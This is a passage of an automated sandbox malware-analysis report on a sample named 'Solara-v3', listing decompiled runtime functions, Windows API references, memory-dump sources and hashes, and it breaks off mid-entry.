                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 2a6a3c02d6077bdc1c335910d5cdb9696e081bfaa363f59219c9e26d1f56c5ea
                                                                                                                                                                                                                                              • Instruction ID: 807ea783ca2d7325a7fff08239e9faf3fcbeb9733c108e65d62ed925ddd9eb25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6a3c02d6077bdc1c335910d5cdb9696e081bfaa363f59219c9e26d1f56c5ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01A0326157175EA72417F5FC46F6E2698E703B7DB24033AF560555F0EF624C02E641
                                                                                                                                                                                                                                              Function 00CAB56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00CAB68D
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00CAB906
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              • Opcode ID: f89ee12d47b90cf088e87e28031d570aa337cda60bb0ea26012f04abd527e8b5
                                                                                                                                                                                                                                              • Instruction ID: f22d2c79a3326b57d1c3ab4d136db52a1eae5c052a6927cee439a7d94e603bff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f89ee12d47b90cf088e87e28031d570aa337cda60bb0ea26012f04abd527e8b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37B15A7180020AEFCF18DFA5C8819AEB7B9FF06318F14455AF8216B252D736DE51EB91
                                                                                                                                                                                                                                              Function 00C9BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9BF44
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9C028
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: 04fd16e2c0a70368a29fcabdeb773b2962e374ed23788b2d6ca9604e0ad5e969
                                                                                                                                                                                                                                              • Instruction ID: 1b215253950c5c51c81674f35c47db4e2ab0e66fe46735ffa08d4d3d1a628ee4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04fd16e2c0a70368a29fcabdeb773b2962e374ed23788b2d6ca9604e0ad5e969
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F41AF78900205EFCF28DFA8EA499ADB7B5BF48300B58805DE459A7651C734EF44DB51
                                                                                                                                                                                                                                              Function 00CA55C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA55F9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA560B
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA562D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction ID: 04e45b4562e0ac766fcaa26d2a52093142dd0bcf43f396b4022f2a031f90f00f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39018631A40659AFDB118F54DD09FEEB7B8FB05B15F004529F821A22A0DB759E00CA90
                                                                                                                                                                                                                                              Function 00CAD6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD76F
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD838
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD89F
                                                                                                                                                                                                                                                • Part of subcall function 00CABF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00C9A67D,00000018,?,00C93D4A,00000018,00000000), ref: 00CABF43
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8B2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                                                                                              • Opcode ID: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction ID: 7388c92329f8f2e89e58155c54f68ed76504ee94ec4d8dc3f7fc9a5945ae50b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE51A172600207AFEB259F618C85EBF3AA9EF46718B190128FD17D6591E734CD50D6A0
                                                                                                                                                                                                                                              Function 00C9EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(?,00C9EFCE,00C98E30,00000000,?,00C98E30,00C9A2F0), ref: 00C9F005
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38), ref: 00C9F024
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F052
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0AD
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 66001078-0
                                                                                                                                                                                                                                              • Opcode ID: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction ID: 7cb60469e60d3eba02824e52c9b2719e854e56e246de6bea652ef82c6105916e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741587160060ADBCF20CF65C989AAEB7F8FF04311B20593EE466C7542D730EA86DB91
                                                                                                                                                                                                                                              Function 00C93C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CA5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CBF
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93CE0
                                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00C93D92
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93DD8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3087743877-0
                                                                                                                                                                                                                                              • Opcode ID: 1cd0a8abbe86fb00f88838daa52ea597eda9e1ab690dabbc9c302d84fb863b36
                                                                                                                                                                                                                                              • Instruction ID: b1e6b096cebeb2add7d7cb4ddc9487e84cfd50b24113dc315e5fe30dafd249ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cd0a8abbe86fb00f88838daa52ea597eda9e1ab690dabbc9c302d84fb863b36
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF4136B2E002588FCF14DF94D858BAEB7B1FB48724F158219D8296B391DB34AE41CF91
                                                                                                                                                                                                                                              Function 00C9D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9D4C9
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9D4D3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9D4EA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00C9D50D
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9D544
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                              • Opcode ID: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction ID: 32339ddc927fb1342d4d5e8b189261eb2aff3d7a84eef0effa841250f0d50a63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01C4719002158FCF01EBA4C949BAE7771AF84724F150009E426AB291CF34DE41EB81
                                                                                                                                                                                                                                              Function 00C9ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9ADDE
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9ADE9
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9AE57
                                                                                                                                                                                                                                                • Part of subcall function 00C9ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C9ACC2
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C9AE04
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00C9AE1A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              • Opcode ID: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction ID: 0169a4fbfd961b30d26cdc201735149d79477b7a5762b6a601f5368f2910be2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD017875A002609BCF06EB20D999B7D7B61FF88750B154059E8169B391CF39AE42EBC2
                                                                                                                                                                                                                                              Function 00C91750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction ID: b9fe75b6089a17dd818b41f35d376e6c35765f103bea6b1e03f2d08101904e2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF14D75A006158FCF14CF69C498BADBBF2FF88324F1942A9E815AB391D734AD45CB90
                                                                                                                                                                                                                                              Function 00C9B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9B809
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction ID: 18fa9d96c0b030266ef7c04d39e6e8cf081da70a01b48637136064ea45a3acb7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E021F535800605FFCF249F94E65AB79B7ACEF84760F14461DE4218B6D1DB34AF40CA90
                                                                                                                                                                                                                                              Function 00CB6940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C), ref: 00CB694D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C,00000000,?,00CABBBC), ref: 00CB6957
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB697F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              • Opcode ID: a2a11a4c7a45d48da7f3ff96574ac33ec8b5cfcc4cc4f264c0fd36bed022cdc5
                                                                                                                                                                                                                                              • Instruction ID: 3b76fd67d7a7efae9e2e21f5bfbf1f2ab42eec6f2caf24b4e021fdf58b2c5e19
